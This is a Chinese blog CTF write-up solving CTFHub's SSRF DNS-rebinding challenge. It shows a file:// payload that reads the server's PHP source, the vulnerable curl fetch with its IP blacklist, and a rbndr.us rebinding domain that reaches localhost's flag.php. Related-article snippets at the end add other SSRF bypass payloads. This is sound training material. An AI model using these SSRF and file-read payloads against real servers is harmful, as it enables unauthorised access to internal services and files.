CTFHub技能树 Web-SSRF DNS重绑定 Bypass

最新推荐文章于 2024-06-06 21:05:22 发布
最新推荐文章于 2024-06-06 21:05:22 发布
阅读量1.8k 收藏 5
点赞数 2
分类专栏: CTFHub WEB Writeup 文章标签: CTFHub技能树 CTF writeup SSRF DNS重绑定 Bypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/118486190
版权

CTFHub技能树 Web-SSRF DNS重绑定 Bypass


hint:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助
启动环境,打开题目为空白,查看URL: 

http://challenge-cafd9f03daa84720.sandbox.ctfhub.com:10800/?url=_

与之前一样的形式,查看?url=127.0.0.1/flag.php:
在这里插入图片描述
提示不允许企业内部IP访问,尝试使用file协议读取源码:?url=file:///var/www/html/index.php
得到index.php页面的源码:

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$url = $_REQUEST['url'];

if (preg_match("/127|172|10|192/", $url)) {
    exit("hacker! Ban Intranet IP");
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

CTFHub技能树 Web-SSRF 302跳转 Bypass一样的黑名单,但题目要求以DNS重绑定的方式绕过。
通过rbndr.us dns rebinding service网站设置DNS:
在这里插入图片描述

使用生成的域名构造Payload:?url=7f000001.7f000002.rbndr.us/flag.php,发送请求,得到flag:
在这里插入图片描述

Senimo_
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-DNS绑定
cdyunaq的博客
05-10 3152
- 前言 - SSRF绕过的一种思路,就是利用DNS绑定,它也被广泛用于绕过同源策略,本质就是欺骗客户端请求的IP地址。 但是之前都是用如xip.io等别人搭建好的平台去利用,没有自己搞过,也没能彻底理解其中的原理 - DNS绑定 - 浏览网页过程中,用户在地址栏中输入包含域名的网址,浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。即域名 => 公共DNS服务器 => IP 但是作为域名的所有者,可以随时设置解析IP,举例如下: 用户第.
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
CTFHUB- DNS绑定 Bypass(小宇特详解)
小宇的web博客
10-23 1576
CTFHUB- DNS绑定 Bypass 1.用我的理解来说就是,用户访问一个特定的域名,然后这个域名原来是一个正常的ip。但是当域名持有者修改域名对应的ip后,用户再访问这个域名的时候,浏览器以为你一直访问的是一个域名,就会认为很安全。这个是DNS绑定攻击 这个是我的理解 这里可以让用户访问一个域名,然后这个域名在访问127.0.0.1 这里我使用的是文中所写的那个网站 https://lock.cmpxchg8b.com/rebinder.html?tdsourcetag=s_pctim_aioms
案例研究-SSRF+DNS rebinding【$5000】
最新发布
the_biggest_baby的博客
06-06 999
分享一篇 HackerOne 上一篇赏金 5000$ 的 DNS rebinding(绑定)绕过 ssrf 的报告的学习记录。Hacking for fun!
WEBSSRF(URL Bypass,数字IP Bypass,302跳转Bypass,DNS绑定Bypass)
Ynh323的博客
05-08 1517
目录 一、URF Bypass 二、 数字IP Bypass 三、302跳转 Bypass 四、DNS绑定Bypass 一、URF Bypass 题目: 解题思路: 1.根据上图提示构造 url=http://notfound.ctfhub.com@127.0.0.1/flag.php 2.访问得到flag 二、 数字IP Bypass 题目: 解题思路: 1.刚开始尝试访问url=127.0.0.1/flag.php 2. 根据上.
SSRF - ctfhub -2【FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 BypassDNS绑定Bypass
bin789456的博客
11-18 2265
FastCGI协议 知识参考:CTFhub官方链接 首先介绍一下原理(这里简单介绍,详情请看官方附件) 如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协议。 和浏览器请求包一样,也是由header、body组成。 还需要提到一个PHP-FPM,FastCGI进程管理器,即在php中(nginx等服务器中间件)FastCGI规则打包好后传递的终点,最后由FPM按照fastcgi的协议将TCP流解析成真正的数据。 比如打包好的数据长这样 { 'GATEWA
ctfhubSSRF
qq_61109509的博客
02-20 828
目录 SSRF 知识点:回环地址 内网访问 伪协议读取文件 数字IP Bypass DNS 绑定 URL Bypass 302跳转 Bypass SSRF 在过滤了一堆中找ip本身 我们不能直接访问pc或moblie,必须通过server操作 直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现 都是让服务器能够访问本地或者内网环境 知识点:回环地址 127.0.0.1 这是一个最常见的回环地址。 回环地址是什么呢? 回环地址并非只有一...
渗透测试DNS绑定
wangluoanquan111的博客
07-31 556
*
浅谈DNS绑定漏洞
蚁景网安学院
10-31 442
前言DNS Rebinding是一个比较早就出现的漏洞,本人也是在最近的一些CTF比赛的web题见识到,便记录学习一下相关的内容DNSDNS是Domain Name Service的缩写...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
Web应用中,如果一个页面可以接受用户输入并以服务器的身份去访问任何URL,就可能出现SSRF漏洞。攻击者可以利用这个漏洞,让服务器访问内网中的敏感服务,比如数据库、内部API或者进行端口扫描等。因此,为了防止...
CTFHub-SSRF
Lionel_kai的博客
09-20 1148
1.POST 去访问flag.php,发现叫我们从127.0.0.1访问, 于是构造?url=http://127.0.0.1/flag.php,发现一个key,再根据题目应该是要求我们使用post提交这个key 这里使用gopher协议提交数据,这里采用了一个python脚本来构造gopher URL gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0...
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6254
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1138
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHUB--技能树--SSRF全解(下篇)
errorr0
05-14 1353
技能树SSRF
CTFhub_SSRF靶场教程
weixin_58954236的博客
09-09 886
请求的URL中必须包含,来尝试利用URL的一些特殊地方绕过这个限制吧访问题目所给的链接,使用bp抓包此flag看长度可知是假的在浏览器中输入构造的payload得到flag:ctfhub{eecad35d4ef30dfb74eaabe4}提交flag。
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 1052
dnslog注入,sqlilabs第九关
如何防范IoT场景下的DNS绑定攻击
05-17
IoT场景下的DNS绑定攻击是一种常见的攻击方式,攻击者通过修改DNS服务器的响应,将用户请求定向到恶意站点上,从而进行钓鱼、窃取用户信息等恶意行为。为了防范DNS绑定攻击,可以考虑以下几个方面: 1. 使用可靠的DNS服务器:选择一个可信赖的DNS服务器,可以有效地降低DNS绑定攻击的风险。建议使用ISP提供的DNS服务器,或者是知名的公共DNS服务器,如Google的8.8.8.8。 2. 增强DNS服务器的安全性:对于企业或机构来说,可以采用DNSSEC等技术对DNS服务器进行加固,提高其安全性。 3. 定期更新设备的固件:IoT设备通常存在漏洞,攻击者可以通过漏洞进行DNS绑定攻击等恶意行为。定期更新设备的固件,可以有效地修复已知的漏洞,提高设备的安全性。 4. 使用HTTPS协议:使用HTTPS协议可以有效地避免DNS绑定攻击。在HTTPS协议下,所有数据都是加密的,攻击者无法篡改数据包内容,从而无法进行定向。 5. 监控网络流量:及时监控网络流量,发现异常流量时及时进行处理,可以有效地防范DNS绑定攻击等网络攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值